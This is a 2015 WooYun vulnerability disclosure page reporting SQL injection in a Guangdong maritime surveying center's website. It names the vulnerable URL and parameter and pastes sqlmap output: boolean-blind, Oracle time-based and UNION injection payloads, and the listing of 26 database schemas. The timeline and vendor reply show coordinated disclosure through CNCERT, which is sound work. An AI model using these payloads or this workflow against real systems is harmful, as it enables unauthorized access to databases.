当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109397

漏洞标题:广东海事测绘中心SQL注入漏洞

相关厂商:广东海事测绘中心

漏洞作者: depycode

提交时间:2015-04-24 17:59

修复时间:2015-06-12 10:26

公开时间:2015-06-12 10:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-28: 厂商已经确认,细节仅向厂商公开
2015-05-08: 细节向核心白帽子及相关领域专家公开
2015-05-18: 细节向普通白帽子公开
2015-05-28: 细节向实习白帽子公开
2015-06-12: 细节向公众公开

简要描述:

RT..

详细说明:

url:http://www.gdhydro.com/


1.jpg


SQL注入:

http://www.gdhydro.com/MaritimeManage/portal/news/news_info.jsp?newsId=2149


[12:07:51] [INFO] testing 'Oracle AND time-based blind'
[12:08:22] [INFO] GET parameter 'newsId' seems to be 'Oracle AND time-based blin
d' injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads s
pecific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Oracle' extending
provided level (1) and risk (1) values? [Y/n] y
[12:08:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:08:27] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[12:08:27] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[12:08:30] [INFO] target URL appears to have 11 columns in query
[12:08:31] [INFO] GET parameter 'newsId' is 'Generic UNION query (NULL) - 1 to 2
0 columns' injectable
GET parameter 'newsId' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 44 HTTP(s) requ
ests:
---
Parameter: newsId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=2149 AND 3997=3997
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: newsId=2149 AND 8821=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(117)||C
HR(120)||CHR(97),5)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: newsId=2149 UNION ALL SELECT NULL,CHR(113)||CHR(98)||CHR(106)||CHR(
106)||CHR(113)||CHR(88)||CHR(72)||CHR(117)||CHR(118)||CHR(106)||CHR(83)||CHR(104
)||CHR(66)||CHR(78)||CHR(108)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
---
[12:08:34] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[12:08:34] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[12:08:34] [INFO] fetching database (schema) names
[12:08:34] [INFO] the SQL query used returns 26 entries
[12:08:35] [INFO] retrieved: CTXSYS
[12:08:36] [INFO] retrieved: DBSNMP
[12:08:36] [INFO] retrieved: DMSYS
[12:08:37] [INFO] retrieved: EXFSYS
[12:08:38] [INFO] retrieved: GDHPD
[12:08:38] [INFO] retrieved: GDHPDWEB
[12:08:39] [INFO] retrieved: HR
[12:08:40] [INFO] retrieved: IX
[12:08:40] [INFO] retrieved: MARITIME
[12:08:41] [INFO] retrieved: MDSYS
[12:08:42] [INFO] retrieved: NTM
[12:08:42] [INFO] retrieved: NTM_EN
[12:08:43] [INFO] retrieved: OE
[12:08:43] [INFO] retrieved: OLAPSYS
[12:08:44] [INFO] retrieved: ORDSYS
[12:08:45] [INFO] retrieved: OUTLN
[12:08:45] [INFO] retrieved: PM
[12:08:46] [INFO] retrieved: SCGRID
[12:08:47] [INFO] retrieved: SCOTT
[12:08:47] [INFO] retrieved: SH
[12:08:49] [INFO] retrieved: SYS
[12:08:50] [INFO] retrieved: SYSMAN
[12:08:50] [INFO] retrieved: SYSTEM
[12:08:51] [INFO] retrieved: TSMSYS
[12:08:52] [INFO] retrieved: WMSYS
[12:08:53] [INFO] retrieved: XDB
available databases [26]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GDHPD
[*] GDHPDWEB
[*] HR
[*] IX
[*] MARITIME
[*] MDSYS
[*] NTM
[*] NTM_EN
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCGRID
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


登录地址:

http://www.gdhydro.com/login.html

漏洞证明:

available databases [26]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GDHPD
[*] GDHPDWEB
[*] HR
[*] IX
[*] MARITIME
[*] MDSYS
[*] NTM
[*] NTM_EN
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCGRID
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

修复方案:

过滤

版权声明:转载请注明来源 depycode@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-04-28 10:24

厂商回复:

已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无